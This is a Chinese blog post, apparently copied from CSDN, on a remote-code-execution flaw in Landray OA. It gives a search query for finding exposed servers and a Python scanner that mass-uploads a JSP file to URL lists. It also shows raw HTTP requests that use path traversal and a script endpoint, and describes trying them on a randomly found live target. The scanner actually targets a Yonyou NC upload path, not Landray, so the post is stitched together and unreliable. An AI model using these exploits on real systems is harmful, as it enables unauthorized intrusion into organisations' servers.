声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。
一、漏洞描述
蓝凌OA平台正通过加速构建产业互联网来深化其数字化发展,从而对企业的协作能力提出了更高的要求。为了支持这一转变,蓝凌推出了新一代生态型OA平台,旨在促进大中型组织的内外协作与管理,支撑办公自动化、管理智能化、应用平台化和组织生态化。然而,由于蓝凌OA平台的某些代码功能模块存在设计缺陷,攻击者可能会利用这些漏洞进行未授权操作,对系统安全构成威胁。
二、资产收集
1.使用网络空间测绘引擎搜索
鹰图检索:app.name="Landray 蓝凌OA"
2.使用poc批量扫描
import requests
import random
import string
import argparse
from urllib3.exceptions import InsecureRequestWarning
# 设置颜色代码用于控制台输出
RED = '\033[91m'
RESET = '\033[0m'
# 忽略不安全的SSL警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# 随机生成字符串函数,长度为n
def rand_base(n):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=n))
# 检查目标URL是否具有特定的RCE(远程代码执行)漏洞
def check_vulnerability(url):
filename = rand_base(6) # 生成随机文件名
upload_url = url.rstrip('/') + '/mp/initcfg/%2e%2e/uploadControl/uploadFile' # 构造上传URL
upload_headers = {
# 构造上传请求头
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundarygcflwtei',
'Connection': 'close'
}
# 构造上传数据体
upload_data = (
'------WebKitFormBoundarygcflwtei\r\n'
f'Content-Disposition: form-data; name="file"; filename="{filename}.jsp"\r\n'
'Content-Type: image/jpeg\r\n\r\n'
'<% out.println("HelloWorldTest");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n'
'------WebKitFormBoundarygcflwtei\r\n'
'Content-Disposition: form-data; name="submit"\r\n\r\n'
'上传\r\n'
'------WebKitFormBoundarygcflwtei--'
).encode('utf-8')
try:
# 发送上传请求
response_upload = requests.post(upload_url, headers=upload_headers, data=upload_data, verify=False, timeout=30)
# 构造访问上传文件的URL
access_url = url.rstrip('/') + f'/mp/uploadFileDir/{filename}.jsp'
access_headers = {
# 访问请求头
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'
}
# 发送访问请求
response_access = requests.get(access_url, headers=access_headers, verify=False, timeout=30)
# 检查响应状态和内容以判断是否存在漏洞
if response_upload.status_code == 200 and response_access.status_code == 200 and "HelloWorldTest" in response_access.text:
print(f"{RED}URL [{url}] 存在用友 NC uploadControluploadFile 文件上传致RCE漏洞{RESET}")
else:
print(f"URL [{url}] 不存在漏洞")
except requests.exceptions.Timeout:
print(f"URL [{url}] 请求超时,可能存在漏洞")
except requests.RequestException as e:
print(f"URL [{url}] 请求失败: {e}")
# 主函数,解析命令行参数并调用检查函数
def main():
parser = argparse.ArgumentParser(description='检测目标地址是否存在用友 NC uploadControluploadFile 文件上传致RCE漏洞')
parser.add_argument('-u', '--url', help='指定目标地址')
parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')
args = parser.parse_args()
# 如果提供了单个URL,则检查该URL
if args.url:
if not args.url.startswith("http://") and not args.url.startswith("https://"):
args.url = "http://" + args.url
check_vulnerability(args.url)
# 如果提供了包含URL的文件,则遍历文件中的每个URL进行检查
elif args.file:
with open(args.file, 'r') as file:
urls = file.read().splitlines()
for url in urls:
if not url.startswith("http://") and not url.startswith("https://"):
url = "http://" + url
check_vulnerability(url)
if __name__ == '__main__':
main()
cmd运行:python poc.py -f url.txt
随机寻找的幸运儿
三、漏洞复现
1.构造数据包
构造数据包:
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host: ip
Accept:application/json,text/javascript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36
X-Requested-With:XMLHttpRequest
Content-Length: 395
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="method"
replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--上传数据包:
POST /resource/help/km/review/dataxml.jsp HTTP/1.1
Host: ip
User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36
Connection:close
Content-Length:17392
Content-Type:application/x-www-form-urlencoded
s_bean=ruleFormulaValidate&script=shell&returnType=int&modelName=test2.数据包分析
构造数据包:
这是一个HTTP POST请求的数据包,用于向服务器发送数据。以下是对该数据包的解析:
-
请求行:
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1,表示这是一个POST请求,目标URL为/sys/ui/sys_ui_component/sysUiComponent.do,使用的HTTP协议版本为1.1。 -
请求头:包含了一些关于请求的信息,如主机名、接受的内容类型、编码方式、语言、连接状态等。
- Host: ip,表示请求的目标服务器的IP地址。
- Accept: application/json,text/javascript,/;q=0.01,表示客户端可以接受的内容类型及其优先级。
- Accept-Encoding: gzip,deflate,表示客户端可以接受的压缩格式。
- Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,表示客户端的首选语言及其优先级。
- Connection: close,表示请求完成后关闭连接。
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51,表示请求体的类型和分隔符。
- User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36,表示客户端的浏览器信息。
- X-Requested-With: XMLHttpRequest,表示请求是由XMLHttpRequest发起的。
- Content-Length: 395,表示请求体的长度为395字节。
-
请求体:包含了实际要发送给服务器的数据。这里使用了multipart/form-data格式,通过分隔符(boundary)来区分不同的表单字段。具体包含以下三个部分:
- method: replaceExtend,表示请求的方法是replaceExtend。
- extendId: ../../../../resource/help/km/review/,表示扩展ID的值。
- folderName: ../../../ekp/sys/common,表示文件夹名称的值。
上传数据包:
这是一个HTTP POST请求的数据包,用于向服务器发送数据。以下是对该数据包的解析:
1. 请求行:`POST /resource/help/km/review/dataxml.jsp HTTP/1.1`,表示这是一个POST请求,目标URL为`/resource/help/km/review/dataxml.jsp`,使用的HTTP协议版本为1.1。
2. 请求头:包含了一些关于请求的信息,如主机名、用户代理、连接状态等。
- Host: ip,表示请求的目标服务器的IP地址。
- User-Agent: Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36,表示客户端的浏览器信息。
- Connection: close,表示请求完成后关闭连接。
- Content-Length: 17392,表示请求体的长度为17392字节。
- Content-Type: application/x-www-form-urlencoded,表示请求体的类型是表单数据。
3. 请求体:包含了实际要发送给服务器的数据。这里使用了application/x-www-form-urlencoded格式,将参数以键值对的形式进行编码。具体包含以下四个参数:
- s_bean=ruleFormulaValidate,表示参数名为s_bean,值为ruleFormulaValidate。
- script=shell,表示参数名为script,值为shell。
- returnType=int,表示参数名为returnType,值为int。
- modelName=test,表示参数名为modelName,值为test。
3.结束跑路
使用yakit Web Fuzzer构造数据包发送。
使用yakit Web Fuzzer上传数据
每篇一言:信心这个东西,什么时候都像个高楼大厦,但是里面会长白蚁。
标签:请求,..,url,OA,Content,URL,form,代码执行,Copy From: https://blog.csdn.net/weixin_54799594/article/details/140644428